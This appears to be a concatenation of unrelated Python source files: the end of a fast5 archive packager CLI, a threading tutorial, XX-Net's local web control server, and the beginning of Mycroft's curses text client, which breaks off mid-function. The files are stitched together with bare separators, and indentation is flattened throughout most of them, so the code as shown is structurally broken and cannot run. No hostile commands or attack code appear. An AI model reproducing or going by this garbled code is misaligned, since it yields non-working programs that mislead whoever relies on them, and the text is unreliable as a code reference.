parser.add_argument("output", help="Export directory")
parser.add_argument("input", nargs="+", help="Import directories")
parser.add_argument("-f", "--filter", nargs="+", default=[".*\.fast5"], help="File filter regex")
parser.add_argument("-b", "--batch_size", type=int, default=4000, help="Number of files to put into one archive")
parser.add_argument("--recursive", action="store_true", help="Recursivly scan import directory")
parser.add_argument("--watch", action="store_true", help="Watch input for incoming files")
parser.add_argument("-l", "--log", default=None, help="Log file")
parser.add_argument("--grace_period", type=int, default=60, help="Time in seconds before treating a file as final")
parser.add_argument("--ignore_existing", action="store_true", help="Proceed with files found in archive but not in import location")
args = parser.parse_args()
# start logging
logger.init(file=args.log, log_types=[logger.log_type.Error, logger.log_type.Info, logger.log_type.Debug] )
# check output Directory
dir_out = os.path.abspath(args.output)
if not (dir_out.endswith('reads') or dir_out.endswith('reads' + os.sep)):
dir_out = os.path.join(dir_out, 'reads')
if os.path.isdir(dir_out):
if not os.access(dir_out, os.W_OK):
logger.log("Output directory existent but not writeable", logger.log_type.Error)
else:
try:
os.makedirs(dir_out, mode=0o744, exist_ok=True)
except FileExistsError:
print("Could not create output directory, file {file} already exists".format(file=dir_out), logger.log_type.Error)
exit(-1)
logger.log("Writing output to {output}".format(output=dir_out), logger.log_type.Info)
# check input
input_dirs = [os.path.abspath(f) for f in args.input if os.path.isdir(f) and os.access(f, os.R_OK)]
if len(input_dirs) == 0:
logger.log("No readable input directory specified", logger.log_type.Error)
exit(-1)
# create packager
pkgr = packager(input_dirs, dir_out, recursive=args.recursive, ignore_existing=args.ignore_existing, regexes=args.filter, batch_size=args.batch_size)
pkgr.start()
# create fs watchdogs
if args.watch:
from watchdog.observers import Observer
from watchdog.events import RegexMatchingEventHandler
wtchdg = fs_watchdog(input_dirs, args.filter)
wtchdg.start()
logger.log("Started file system observer, press CTRL + C to abort")
try:
while True:
for f in wtchdg.files(t=args.grace_period):
pkgr.put(f)
except KeyboardInterrupt:
logger.log("Abort by user, trying to shutdown properly")
wtchdg.stop()
try:
pkgr.stop()
except KeyboardInterrupt:
pkgr.stop() # packager has received interrupt and will shutdown
logger.log("Mission accomplished")
|
threading_learning_1.py
|
# The first way to create threads with the threading module is to pass a function into a Thread instance and call its start() method.
# The second way is to subclass threading.Thread and override its __init__() and run() methods.
# Below is the first approach.
import random
import time
import threading
# Code executed by the new threads
def thread_run(urls):
print("Current %s is running..." % threading.current_thread().name)
for url in urls:
print("%s ----------> %s" % (threading.current_thread().name, url))
time.sleep(random.random())
print("%s ended." % threading.current_thread().name)
if __name__ == '__main__':
print("%s is running..." % threading.current_thread().name)
t1 = threading.Thread(target=thread_run, name='Thread_1', args=(['url_1', 'url_2', 'url_3'],))
t2 = threading.Thread(target=thread_run, name='Thread_2', args=(['url_4', 'url_5', 'url_6'],))
    # Start execution
t1.start()
t2.start()
t1.join()
t2.join()
print("%s ended." % threading.current_thread().name)
|
web_control.py
|
#!/usr/bin/env python
# coding:utf-8
import os, sys
current_path = os.path.dirname(os.path.abspath(__file__))
if __name__ == "__main__":
python_path = os.path.abspath( os.path.join(current_path, os.pardir, 'python27', '1.0'))
noarch_lib = os.path.abspath( os.path.join(python_path, 'lib', 'noarch'))
sys.path.append(noarch_lib)
import re
import socket, ssl
import urlparse
import threading
import urllib2
import time
root_path = os.path.abspath(os.path.join(current_path, os.pardir))
import yaml
import json
from instances import xlog
import module_init
import config
import autorun
import update_from_github
import simple_http_server
from simple_i18n import SimpleI18N
NetWorkIOError = (socket.error, ssl.SSLError, OSError)
i18n_translator = SimpleI18N(config.get(['language'], None))
module_menus = {}
class Http_Handler(simple_http_server.HttpServerHandler):
deploy_proc = None
def load_module_menus(self):
global module_menus
new_module_menus = {}
#config.load()
modules = config.get(['modules'], None)
for module in modules:
values = modules[module]
if module != "launcher" and config.get(["modules", module, "auto_start"], 0) != 1: # skip php_proxy module
continue
menu_path = os.path.join(root_path, module, "web_ui", "menu.yaml") # launcher & gae_proxy modules
if not os.path.isfile(menu_path):
continue
# i18n code lines (Both the locale dir & the template dir are module-dependent)
locale_dir = os.path.abspath(os.path.join(root_path, module, 'lang'))
stream = i18n_translator.render(locale_dir, menu_path)
module_menu = yaml.load(stream)
new_module_menus[module] = module_menu
module_menus = sorted(new_module_menus.iteritems(), key=lambda (k,v): (v['menu_sort_id']))
#for k,v in self.module_menus:
# xlog.debug("m:%s id:%d", k, v['menu_sort_id'])
def do_POST(self):
refer = self.headers.getheader('Referer')
if refer:
refer_loc = urlparse.urlparse(refer).netloc
host = self.headers.getheader('host')
if refer_loc != host:
xlog.warn("web control ref:%s host:%s", refer_loc, host)
return
#url_path = urlparse.urlparse(self.path).path
url_path_list = self.path.split('/')
if len(url_path_list) >= 3 and url_path_list[1] == "module":
module = url_path_list[2]
if len(url_path_list) >= 4 and url_path_list[3] == "control":
if module not in module_init.proc_handler:
xlog.warn("request %s no module in path", self.path)
self.send_not_found()
return
path = '/' + '/'.join(url_path_list[4:])
                controller = module_init.proc_handler[module]["imp"].local.web_control.ControlHandler(self.client_address, self.headers, self.command, path, self.rfile, self.wfile)
                controller.do_POST()
return
def do_GET(self):
refer = self.headers.getheader('Referer')
if refer:
refer_loc = urlparse.urlparse(refer).netloc
host = self.headers.getheader('host')
if refer_loc != host:
xlog.warn("web control ref:%s host:%s", refer_loc, host)
return
        # check for '..', which could be used to leak files
if re.search(r'(\.{2})', self.path) is not None:
self.wfile.write(b'HTTP/1.1 404\r\n\r\n')
            xlog.warn('%s %s %s hacking', self.address_string(), self.command, self.path)
return
url_path = urlparse.urlparse(self.path).path
if url_path == '/':
return self.req_index_handler()
url_path_list = self.path.split('/')
if len(url_path_list) >= 3 and url_path_list[1] == "module":
module = url_path_list[2]
if len(url_path_list) >= 4 and url_path_list[3] == "control":
if module not in module_init.proc_handler:
xlog.warn("request %s no module in path", url_path)
self.send_not_found()
return
if "imp" not in module_init.proc_handler[module]:
xlog.warn("request module:%s start fail", module)
self.send_not_found()
return
path = '/' + '/'.join(url_path_list[4:])
                    controller = module_init.proc_handler[module]["imp"].local.web_control.ControlHandler(self.client_address, self.headers, self.command, path, self.rfile, self.wfile)
                    controller.do_GET()
return
else:
relate_path = '/'.join(url_path_list[3:])
file_path = os.path.join(root_path, module, "web_ui", relate_path)
if not os.path.isfile(file_path):
return self.send_not_found()
# i18n code lines (Both the locale dir & the template dir are module-dependent)
locale_dir = os.path.abspath(os.path.join(root_path, module, 'lang'))
content = i18n_translator.render(locale_dir, file_path)
return self.send_response('text/html', content)
else:
file_path = os.path.join(current_path, 'web_ui' + url_path)
            xlog.debug('launcher web_control %s %s %s ', self.address_string(), self.command, self.path)
if os.path.isfile(file_path):
if file_path.endswith('.js'):
mimetype = 'application/javascript'
elif file_path.endswith('.css'):
mimetype = 'text/css'
elif file_path.endswith('.html'):
mimetype = 'text/html'
elif file_path.endswith('.jpg'):
mimetype = 'image/jpeg'
elif file_path.endswith('.png'):
mimetype = 'image/png'
else:
mimetype = 'text/plain'
self.send_file(file_path, mimetype)
elif url_path == '/config':
self.req_config_handler()
elif url_path == '/update':
self.req_update_handler()
elif url_path == '/init_module':
self.req_init_module_handler()
elif url_path == '/quit':
self.send_response('text/html', '{"status":"success"}')
module_init.stop_all()
os._exit(0)
elif url_path == '/restart':
self.send_response('text/html', '{"status":"success"}')
update_from_github.restart_xxnet()
else:
self.send_not_found()
xlog.info('%s "%s %s HTTP/1.1" 404 -', self.address_string(), self.command, self.path)
def req_index_handler(self):
req = urlparse.urlparse(self.path).query
reqs = urlparse.parse_qs(req, keep_blank_values=True)
try:
target_module = reqs['module'][0]
target_menu = reqs['menu'][0]
except:
if config.get(['modules', 'gae_proxy', 'auto_start'], 0) == 1:
target_module = 'gae_proxy'
target_menu = 'status'
else:
target_module = 'launcher'
target_menu = 'about'
if len(module_menus) == 0:
self.load_module_menus()
# i18n code lines (Both the locale dir & the template dir are module-dependent)
locale_dir = os.path.abspath(os.path.join(current_path, 'lang'))
index_content = i18n_translator.render(locale_dir, os.path.join(current_path, "web_ui", "index.html"))
current_version = update_from_github.current_version()
menu_content = ''
for module,v in module_menus:
#xlog.debug("m:%s id:%d", module, v['menu_sort_id'])
title = v["module_title"]
menu_content += '<li class="nav-header">%s</li>\n' % title
for sub_id in v['sub_menus']:
sub_title = v['sub_menus'][sub_id]['title']
sub_url = v['sub_menus'][sub_id]['url']
if target_module == module and target_menu == sub_url:
active = 'class="active"'
else:
active = ''
menu_content += '<li %s><a href="/?module=%s&menu=%s">%s</a></li>\n' % (active, module, sub_url, sub_title)
right_content_file = os.path.join(root_path, target_module, "web_ui", target_menu + ".html")
if os.path.isfile(right_content_file):
# i18n code lines (Both the locale dir & the template dir are module-dependent)
locale_dir = os.path.abspath(os.path.join(root_path, target_module, 'lang'))
right_content = i18n_translator.render(locale_dir, os.path.join(root_path, target_module, "web_ui", target_menu + ".html"))
else:
right_content = ""
data = (index_content.decode('utf-8') % (current_version, current_version, menu_content, right_content.decode('utf-8') )).encode('utf-8')
self.send_response('text/html', data)
def req_config_handler(self):
req = urlparse.urlparse(self.path).query
reqs = urlparse.parse_qs(req, keep_blank_values=True)
data = ''
if reqs['cmd'] == ['get_config']:
config.load()
check_update = config.get(["update", "check_update"], 1)
if check_update == 0:
check_update = "dont-check"
elif check_update == 1:
check_update = "stable"
data = '{ "check_update": "%s", "language": "%s", "popup_webui": %d, "allow_remote_connect": %d, \
"show_systray": %d, "auto_start": %d, "show_detail": %d, "php_enable": %d, "gae_proxy_enable": %d, \
"x_tunnel_enable": %d}' %\
(check_update
, config.get(["language"], i18n_translator.lang)
, config.get(["modules", "launcher", "popup_webui"], 1)
, config.get(["modules", "launcher", "allow_remote_connect"], 0)
, config.get(["modules", "launcher", "show_systray"], 1)
, config.get(["modules", "launcher", "auto_start"], 0)
, config.get(["modules", "gae_proxy", "show_detail"], 0)
, config.get(["modules", "php_proxy", "auto_start"], 0)
, config.get(["modules", "gae_proxy", "auto_start"], 0)
, config.get(["modules", "x_tunnel", "auto_start"], 0)
)
elif reqs['cmd'] == ['set_config']:
if 'check_update' in reqs:
check_update = reqs['check_update'][0]
if check_update not in ["dont-check", "stable", "test"]:
data = '{"res":"fail, check_update:%s"}' % check_update
else:
config.set(["update", "check_update"], check_update)
config.save()
data = '{"res":"success"}'
elif 'language' in reqs:
language = reqs['language'][0]
if language not in i18n_translator.get_valid_languages():
data = '{"res":"fail, language:%s"}' % language
else:
config.set(["language"], language)
config.save()
i18n_translator.lang = language
self.load_module_menus()
data = '{"res":"success"}'
elif 'popup_webui' in reqs:
popup_webui = int(reqs['popup_webui'][0])
if popup_webui != 0 and popup_webui != 1:
data = '{"res":"fail, popup_webui:%s"}' % popup_webui
else:
config.set(["modules", "launcher", "popup_webui"], popup_webui)
config.save()
data = '{"res":"success"}'
elif 'allow_remote_connect' in reqs:
allow_remote_connect = int(reqs['allow_remote_connect'][0])
if allow_remote_connect != 0 and allow_remote_connect != 1:
data = '{"res":"fail, allow_remote_connect:%s"}' % allow_remote_connect
else:
config.set(["modules", "launcher", "allow_remote_connect"], allow_remote_connect)
config.save()
data = '{"res":"success"}'
xlog.debug("restart web control.")
stop()
time.sleep(1)
start()
xlog.debug("launcher web control restarted.")
elif 'show_systray' in reqs:
show_systray = int(reqs['show_systray'][0])
if show_systray != 0 and show_systray != 1:
data = '{"res":"fail, show_systray:%s"}' % show_systray
else:
config.set(["modules", "launcher", "show_systray"], show_systray)
config.save()
data = '{"res":"success"}'
elif 'auto_start' in reqs:
auto_start = int(reqs['auto_start'][0])
if auto_start != 0 and auto_start != 1:
data = '{"res":"fail, auto_start:%s"}' % auto_start
else:
if auto_start:
autorun.enable()
else:
autorun.disable()
config.set(["modules", "launcher", "auto_start"], auto_start)
config.save()
data = '{"res":"success"}'
elif 'show_detail' in reqs:
show_detail = int(reqs['show_detail'][0])
if show_detail != 0 and show_detail != 1:
data = '{"res":"fail, show_detail:%s"}' % show_detail
else:
config.set(["modules", "gae_proxy", "show_detail"], show_detail)
config.save()
data = '{"res":"success"}'
elif 'gae_proxy_enable' in reqs :
gae_proxy_enable = int(reqs['gae_proxy_enable'][0])
if gae_proxy_enable != 0 and gae_proxy_enable != 1:
data = '{"res":"fail, gae_proxy_enable:%s"}' % gae_proxy_enable
else:
config.set(["modules", "gae_proxy", "auto_start"], gae_proxy_enable)
config.save()
if gae_proxy_enable:
module_init.start("gae_proxy")
else:
module_init.stop("gae_proxy")
self.load_module_menus()
data = '{"res":"success"}'
elif 'php_enable' in reqs :
php_enable = int(reqs['php_enable'][0])
if php_enable != 0 and php_enable != 1:
data = '{"res":"fail, php_enable:%s"}' % php_enable
else:
config.set(["modules", "php_proxy", "auto_start"], php_enable)
config.save()
if php_enable:
module_init.start("php_proxy")
else:
module_init.stop("php_proxy")
self.load_module_menus()
data = '{"res":"success"}'
elif 'x_tunnel_enable' in reqs :
x_tunnel_enable = int(reqs['x_tunnel_enable'][0])
if x_tunnel_enable != 0 and x_tunnel_enable != 1:
data = '{"res":"fail, x_tunnel_enable:%s"}' % x_tunnel_enable
else:
config.set(["modules", "x_tunnel", "auto_start"], x_tunnel_enable)
config.save()
if x_tunnel_enable:
module_init.start("x_tunnel")
else:
module_init.stop("x_tunnel")
self.load_module_menus()
data = '{"res":"success"}'
else:
data = '{"res":"fail"}'
self.send_response('text/html', data)
def req_update_handler(self):
req = urlparse.urlparse(self.path).query
reqs = urlparse.parse_qs(req, keep_blank_values=True)
data = ''
if reqs['cmd'] == ['get_progress']:
data = json.dumps(update_from_github.progress)
elif reqs['cmd'] == ['get_new_version']:
current_version = update_from_github.current_version()
github_versions = update_from_github.get_github_versions()
data = '{"res":"success", "test_version":"%s", "stable_version":"%s", "current_version":"%s"}' % (github_versions[0][1], github_versions[1][1], current_version)
xlog.info("%s", data)
elif reqs['cmd'] == ['update_version']:
version = reqs['version'][0]
update_from_github.start_update_version(version)
data = '{"res":"success"}'
self.send_response('text/html', data)
def req_init_module_handler(self):
req = urlparse.urlparse(self.path).query
reqs = urlparse.parse_qs(req, keep_blank_values=True)
data = ''
try:
module = reqs['module'][0]
config.load()
if reqs['cmd'] == ['start']:
result = module_init.start(module)
data = '{ "module": "%s", "cmd": "start", "result": "%s" }' % (module, result)
elif reqs['cmd'] == ['stop']:
result = module_init.stop(module)
data = '{ "module": "%s", "cmd": "stop", "result": "%s" }' % (module, result)
elif reqs['cmd'] == ['restart']:
result_stop = module_init.stop(module)
result_start = module_init.start(module)
data = '{ "module": "%s", "cmd": "restart", "stop_result": "%s", "start_result": "%s" }' % (module, result_stop, result_start)
except Exception as e:
xlog.exception("init_module except:%s", e)
self.send_response("text/html", data)
process = 0
server = 0
def start():
global process, server
    # should use config.yaml to bind ip
allow_remote = config.get(["modules", "launcher", "allow_remote_connect"], 0)
host_port = config.get(["modules", "launcher", "control_port"], 8085)
if allow_remote:
host_addr = "0.0.0.0"
else:
host_addr = "127.0.0.1"
xlog.info("begin to start web control")
server = simple_http_server.HTTPServer((host_addr, host_port), Http_Handler)
process = threading.Thread(target=server.serve_forever)
process.setDaemon(True)
process.start()
xlog.info("launcher web control started.")
def stop():
global process, server
if process == 0:
return
xlog.info("begin to exit web control")
server.shutdown()
server.server_close()
process.join()
xlog.info("launcher web control exited.")
process = 0
def http_request(url, method="GET"):
proxy_handler = urllib2.ProxyHandler({})
opener = urllib2.build_opener(proxy_handler)
try:
req = opener.open(url, timeout=30)
return req
except Exception as e:
#xlog.exception("web_control http_request:%s fail:%s", url, e)
return False
def confirm_xxnet_exit():
"""suppose xxnet is running, try to close it
"""
is_xxnet_exit = False
xlog.debug("start confirm_xxnet_exit")
for i in range(30):
# gae_proxy(default port:8087)
if http_request("http://127.0.0.1:8087/quit") == False:
xlog.debug("good, xxnet:8087 cleared!")
is_xxnet_exit = True
break
else:
xlog.debug("<%d>: try to terminate xxnet:8087" % i)
time.sleep(1)
for i in range(30):
# web_control(default port:8085)
host_port = config.get(["modules", "launcher", "control_port"], 8085)
req_url = "http://127.0.0.1:{port}/quit".format(port=host_port)
if http_request(req_url) == False:
xlog.debug("good, xxnet:%s clear!" % host_port)
is_xxnet_exit = True
break
else:
xlog.debug("<%d>: try to terminate xxnet:%s" % (i, host_port))
time.sleep(1)
xlog.debug("finished confirm_xxnet_exit")
return is_xxnet_exit
def confirm_module_ready(port):
if port == 0:
xlog.error("confirm_module_ready with port 0")
time.sleep(1)
return False
for i in range(200):
req = http_request("http://127.0.0.1:%d/is_ready" % port)
if req == False:
time.sleep(1)
continue
content = req.read(1024)
req.close()
#xlog.debug("cert_import_ready return:%s", content)
if content == "True":
return True
else:
time.sleep(1)
return False
if __name__ == "__main__":
pass
#confirm_xxnet_exit()
# http_request("http://getbootstrap.com/dist/js/bootstrap.min.js")
|
text_client.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import io
from math import ceil
import xdg.BaseDirectory
from .gui_server import start_qml_gui
from mycroft.tts import TTS
import os
import os.path
import time
import curses
import textwrap
import json
import mycroft.version
from threading import Thread, Lock
from mycroft.messagebus.client import MessageBusClient
from mycroft.messagebus.message import Message
from mycroft.util.log import LOG
from mycroft.configuration import Configuration
import locale
# Curses uses LC_ALL to determine how to display chars; set it to the system
# default
locale.setlocale(locale.LC_ALL, "") # Set LC_ALL to user default
preferred_encoding = locale.getpreferredencoding()
bSimple = False
bus = None # Mycroft messagebus connection
config = {} # Will be populated by the Mycroft configuration
event_thread = None
history = []
chat = [] # chat history, oldest at the lowest index
line = ""
scr = None
log_line_offset = 0 # num lines back in logs to show
log_line_lr_scroll = 0 # amount to scroll left/right for long lines
longest_visible_line = 0 # for HOME key
auto_scroll = True
# for debugging odd terminals
last_key = ""
show_last_key = False
show_gui = None # None = not initialized, else True/False
gui_text = []
log_lock = Lock()
max_log_lines = 5000
mergedLog = []
filteredLog = []
default_log_filters = ["mouth.viseme", "mouth.display", "mouth.icon"]
log_filters = list(default_log_filters)
log_files = []
find_str = None
cy_chat_area = 7 # default chat history height (in lines)
size_log_area = 0 # max number of visible log lines, calculated during draw
# Values used to display the audio meter
show_meter = True
meter_peak = 20
meter_cur = -1
meter_thresh = -1
SCR_MAIN = 0
SCR_HELP = 1
SCR_SKILLS = 2
screen_mode = SCR_MAIN
subscreen = 0 # for help pages, etc.
REDRAW_FREQUENCY = 10 # seconds between full redraws
last_redraw = time.time() - (REDRAW_FREQUENCY - 1) # seed for 1s redraw
screen_lock = Lock()
is_screen_dirty = True
# Curses color codes (reassigned at runtime)
CLR_HEADING = 0
CLR_FIND = 0
CLR_CHAT_RESP = 0
CLR_CHAT_QUERY = 0
CLR_CMDLINE = 0
CLR_INPUT = 0
CLR_LOG1 = 0
CLR_LOG2 = 0
CLR_LOG_DEBUG = 0
CLR_LOG_ERROR = 0
CLR_LOG_CMDMESSAGE = 0
CLR_METER_CUR = 0
CLR_METER = 0
# Allow Ctrl+C catching...
ctrl_c_was_pressed = False
def ctrl_c_handler(signum, frame):
global ctrl_c_was_pressed
ctrl_c_was_pressed = True
def ctrl_c_pressed():
global ctrl_c_was_pressed
if ctrl_c_was_pressed:
ctrl_c_was_pressed = False
return True
else:
return False
##############################################################################
# Helper functions
def clamp(n, smallest, largest):
""" Force n to be between smallest and largest, inclusive """
return max(smallest, min(n, largest))
def handleNonAscii(text):
"""
If default locale supports UTF-8 reencode the string otherwise
remove the offending characters.
"""
if preferred_encoding == 'ASCII':
return ''.join([i if ord(i) < 128 else ' ' for i in text])
else:
return text.encode(preferred_encoding)
##############################################################################
# Settings
filename = "mycroft_cli.conf"
def load_mycroft_config(bus):
""" Load the mycroft config and connect it to updates over the messagebus.
"""
Configuration.set_config_update_handlers(bus)
return Configuration.get()
def connect_to_mycroft():
""" Connect to the mycroft messagebus and load and register config
on the bus.
Sets the bus and config global variables
"""
global bus
global config
bus = connect_to_messagebus()
config = load_mycroft_config(bus)
def load_settings():
global log_filters
global cy_chat_area
global show_last_key
global max_log_lines
global show_meter
config_file = None
# Old location
path = os.path.join(os.path.expanduser("~"), ".mycroft_cli.conf")
if os.path.isfile(path):
LOG.warning(" ===============================================")
LOG.warning(" == DEPRECATION WARNING ==")
LOG.warning(" ===============================================")
LOG.warning(" You still have a config file at " +
path)
LOG.warning(" Note that this location is deprecated and will" +
" not be used in the future")
LOG.warning(" Please move it to " +
os.path.join(xdg.BaseDirectory.xdg_config_home, 'mycroft',
filename))
config_file = path
# Check XDG_CONFIG_DIR
if config_file is None:
for conf_dir in xdg.BaseDirectory.load_config_paths('mycroft'):
xdg_file = os.path.join(conf_dir, filename)
if os.path.isfile(xdg_file):
config_file = xdg_file
break
# Check /etc/mycroft
if config_file is None:
config_file = os.path.join("/etc/mycroft", filename)
try:
with io.open(config_file, 'r') as f:
config = json.load(f)
if "filters" in config:
# Disregard the filtering of DEBUG messages
log_filters = [f for f in config["filters"] if f != "DEBUG"]
if "cy_chat_area" in config:
cy_chat_area = config["cy_chat_area"]
if "show_last_key" in config:
show_last_key = config["show_last_key"]
if "max_log_lines" in config:
max_log_lines = config["max_log_lines"]
if "show_meter" in config:
show_meter = config["show_meter"]
except Exception as e:
LOG.info("Ignoring failed load of settings file")
def save_settings():
config = {}
config["filters"] = log_filters
config["cy_chat_area"] = cy_chat_area
config["show_last_key"] = show_last_key
config["max_log_lines"] = max_log_lines
config["show_meter"] = show_meter
config_file = os.path.join(
xdg.BaseDirectory.save_config_path("mycroft"), filename)
with io.open(config_file, 'w') as f:
f.write(str(json.dumps(config, ensure_ascii=False)))
##############################################################################
# Log file monitoring
class LogMonitorThread(Thread):
def __init__(self, filename, logid):
global log_files
Thread.__init__(self)
self.filename = filename
self.st_results = os.stat(filename)
self.logid = str(logid)
log_files.append(filename)
def run(self):
while True:
try:
st_results = os.stat(self.filename)
# Check if file has been modified since last read
if not st_results.st_mtime == self.st_results.st_mtime:
self.read_file_from(self.st_results.st_size)
self.st_results = st_results
set_screen_dirty()
except OSError:
# ignore any file IO exceptions, just try again
pass
time.sleep(0.1)
def read_file_from(self, bytefrom):
global meter_cur
global meter_thresh
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with io.open(self.filename) as fh:
fh.seek(bytefrom)
while True:
line = fh.readline()
if line == "":
break
# Allow user to filter log output
ignore = False
if find_str:
if find_str not in line:
ignore = True
else:
for filtered_text in log_filters:
if filtered_text in line:
ignore = True
break
with log_lock:
if ignore:
mergedLog.append(self.logid + line.rstrip())
else:
if bSimple:
print(line.rstrip())
else:
filteredLog.append(self.logid + line.rstrip())
mergedLog.append(self.logid + line.rstrip())
if not auto_scroll:
log_line_offset += 1
# Limit log to max_log_lines
if len(mergedLog) >= max_log_lines:
with log_lock:
cToDel = len(mergedLog) - max_log_lines
if len(filteredLog) == len(mergedLog):
del filteredLog[:cToDel]
del mergedLog[:cToDel]
# release log_lock before calling to prevent deadlock
if len(filteredLog) != len(mergedLog):
rebuild_filtered_log()
def start_log_monitor(filename):
if os.path.isfile(filename):
thread = LogMonitorThread(filename, len(log_files))
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
class MicMonitorThread(Thread):
def __init__(self, filename):
Thread.__init__(self)
self.filename = filename
self.st_results = None
def run(self):
while True:
try:
st_results = os.stat(self.filename)
if (not self.st_results or
not st_results.st_ctime == self.st_results.st_ctime or
not st_results.st_mtime == self.st_results.st_mtime):
self.read_mic_level()
self.st_results = st_results
set_screen_dirty()
except Exception:
# Ignore whatever failure happened and just try again later
pass
time.sleep(0.2)
def read_mic_level(self):
global meter_cur
global meter_thresh
with io.open(self.filename, 'r') as fh:
line = fh.readline()
# Just adjust meter settings
# Ex:Energy: cur=4 thresh=1.5 muted=0
cur_text, thresh_text, _ = line.split(' ')[-3:]
meter_thresh = float(thresh_text.split('=')[-1])
meter_cur = float(cur_text.split('=')[-1])
class ScreenDrawThread(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
global scr
global screen_lock
global is_screen_dirty
global log_lock
while scr:
try:
if is_screen_dirty:
# Use a lock to prevent screen corruption when drawing
# from multiple threads
with screen_lock:
is_screen_dirty = False
if screen_mode == SCR_MAIN:
with log_lock:
do_draw_main(scr)
elif screen_mode == SCR_HELP:
do_draw_help(scr)
finally:
time.sleep(0.01)
def start_mic_monitor(filename):
if os.path.isfile(filename):
thread = MicMonitorThread(filename)
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
def add_log_message(message):
""" Show a message for the user (mixed in the logs) """
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
message = "@" + message # the first byte is a code
filteredLog.append(message)
mergedLog.append(message)
if log_line_offset != 0:
log_line_offset = 0 # scroll so the user can see the message
set_screen_dirty()
def clear_log():
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
mergedLog = []
filteredLog = []
log_line_offset = 0
def rebuild_filtered_log():
global filteredLog
global mergedLog
global log_lock
with log_lock:
filteredLog = []
for line in mergedLog:
# Apply filters
ignore = False
if find_str and find_str != "":
# Searching log
if find_str not in line:
ignore = True
else:
# Apply filters
for filtered_text in log_filters:
if filtered_text and filtered_text in line:
ignore = True
break
if not ignore:
filteredLog.append(line)
##############################################################################
# Capturing output from Mycroft
def handle_speak(event):
global chat
utterance = event.data.get('utterance')
utterance = TTS.remove_ssml(utterance)
if bSimple:
print(">> " + utterance)
else:
chat.append(">> " + utterance)
set_screen_dirty()
def handle_utterance(event):
global chat
global history
utterance = event.data.get('utterances')[0]
history.append(utterance)
chat.append(utterance)
set_screen_dirty()
def connect(bus):
""" Run the mycroft messagebus referenced by bus.
Args:
bus: Mycroft messagebus instance
"""
bus.run_forever()
##############################################################################
# Capturing the messagebus
def handle_message(msg):
# TODO: Think this thru a little bit -- remove this logging within core?
# add_log_message(msg)
pass
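# Illustrative sketch (not part of the original client): how the handlers
# above would typically be attached to the messagebus.  The actual wiring
# happens in the client start-up code; the message types shown are the
# standard Mycroft ones.
def _example_attach_handlers(bus):
    bus.on('speak', handle_speak)                            # spoken responses -> chat pane
    bus.on('recognizer_loop:utterance', handle_utterance)    # recognized queries -> chat pane
    bus.on('message', handle_message)                        # every bus message (currently ignored)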
##############################################################################
# "Graphic primitives"
def draw(x, y, msg, pad=None, pad_chr=None, clr=None):
"""Draw a text to the screen
Args:
x (int): X coordinate (col), 0-based from upper-left
y (int): Y coordinate (row), 0-based from upper-left
msg (str): string to render to screen
pad (bool or int, optional): if int, pads/clips to given length, if
True use right edge of the screen.
pad_chr (char, optional): pad character, default is space
clr (int, optional): curses color, Defaults to CLR_LOG1.
"""
if y < 0 or y > curses.LINES or x < 0 or x > curses.COLS:
return
if x + len(msg) > curses.COLS:
s = msg[:curses.COLS - x]
else:
s = msg
if pad:
ch = pad_chr or " "
if pad is True:
pad = curses.COLS # pad to edge of screen
s += ch * (pad - x - len(msg))
else:
# pad to given length (or screen width)
if x + pad > curses.COLS:
pad = curses.COLS - x
s += ch * (pad - len(msg))
if not clr:
clr = CLR_LOG1
scr.addstr(y, x, s, clr)
##############################################################################
# Screen handling
def init_screen():
global CLR_HEADING
global CLR_FIND
global CLR_CHAT_RESP
global CLR_CHAT_QUERY
global CLR_CMDLINE
global CLR_INPUT
global CLR_LOG1
global CLR_LOG2
global CLR_LOG_DEBUG
global CLR_LOG_ERROR
global CLR_LOG_CMDMESSAGE
global CLR_METER_CUR
global CLR_METER
if curses.has_colors():
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
bg = curses.COLOR_BLACK
for i in range(1, curses.COLORS):
curses.init_pair(i + 1, i, bg)
        # Colors (on black background):
# 1 = white 5 = dk blue
# 2 = dk red 6 = dk purple
# 3 = dk green 7 = dk cyan
# 4 = dk yellow 8 = lt gray
CLR_HEADING = curses.color_pair(1)
CLR_CHAT_RESP = curses.color_pair(4)
CLR_CHAT_QUERY = curses.color_pair(7)
CLR_FIND = curses.color_pair(4)
CLR_CMDLINE = curses.color_pair(7)
CLR_INPUT = curses.color_pair(7)
CLR_LOG1 = curses.color_pair(3)
CLR_LOG2 = curses.color_pair(6)
CLR_LOG_DEBUG = curses.color_pair(4)
CLR_LOG_ERROR = curses.color_pair(2)
CLR_LOG_CMDMESSAGE = curses.color_pair(2)
CLR_METER_CUR = curses.color_pair(2)
CLR_METER = curses.color_pair(4)
def scroll_log(up, num_lines=None):
global log_line_offset
# default to a half-page
if not num_lines:
num_lines = size_log_area // 2
with log_lock:
if up:
log_line_offset -= num_lines
else:
log_line_offset += num_lines
if log_line_offset > len(filteredLog):
log_line_offset = len(filteredLog) - 10
if log_line_offset < 0:
log_line_offset = 0
set_screen_dirty()
def _do_meter(height):
if not show_meter or meter_cur == -1:
return
# The meter will look something like this:
#
# 8.4 *
# *
# -*- 2.4
# *
# *
# *
# Where the left side is the current level and the right side is
# the threshold level for 'silence'.
global scr
global meter_peak
if meter_cur > meter_peak:
meter_peak = meter_cur + 1
scale = meter_peak
if meter_peak > meter_thresh * 3:
scale = meter_thresh * 3
h_cur = clamp(int((float(meter_cur) / scale) * height), 0, height - 1)
h_thresh = clamp(
int((float(meter_thresh) / scale) * height), 0, height - 1)
clr = curses.color_pair(4) # dark yellow
str_level = "{0:3} ".format(int(meter_cur)) # e.g. ' 4'
str_thresh = "{0:4.2f}".format(meter_thresh) # e.g. '3.24'
meter_width = len(str_level) + len(str_thresh) + 4
for i in range(0, height):
meter = ""
if i == h_cur:
# current energy level
meter = str_level
else:
